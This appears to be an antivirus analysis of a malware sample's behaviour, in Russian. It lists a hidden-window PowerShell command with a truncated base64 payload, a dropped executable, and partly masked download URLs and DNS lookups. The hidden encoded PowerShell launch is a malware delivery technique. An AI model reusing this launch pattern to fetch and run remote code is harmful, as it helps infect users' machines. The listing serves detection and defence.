Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABYAHQAdABuAGcAYQBsAGIAeABrAGYAPQAnAEoAYQBjAHEAZgBvAHgAYwB5AHcAeAAnADsAJABEAHYAcgBtAHoAegBpAG0AcAAgAD0AIAAnADcAOAA0ACcAOwAkAEMAdwBsAHEAeQBmAG0AcAB0AHYAdQB6AD0AJwBEAGgAdQB5AHEAYgB...
- %HOMEPATH%\784.exe
- http://de####odgrains.com/bhdz/f6bnbu-p5mk50-933/
- http://s9.#l6.us/dl/k3g17-hfafxhrq-235897/
- http://www.pl###gicals.com/wp/i3scs-2lv-03535841/
- http://de#######ela.webcindario.com/wp-admin/PXstiz/
- DNS ASK en####er.emilee.jp
- DNS ASK de####odgrains.com
- DNS ASK s9.#l6.us
- DNS ASK pl###gicals.com
- DNS ASK de#######ela.webcindario.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABYAHQAdABuAGcAYQBsAGIAeABrAGYAPQAnAEoAYQBjAHEAZgBvAHgAYwB5AHcAeAAnADsAJABEAHYAcgBtAHoAegBpAG0AcAAgAD0AIAAnADcAOAA0ACcAOwAkAEMAdwBsAHEAeQBmAG0AcAB0AHYAdQB6AD0AJwBEAGgAdQB5AHEAYgB...' (со скрытым окном)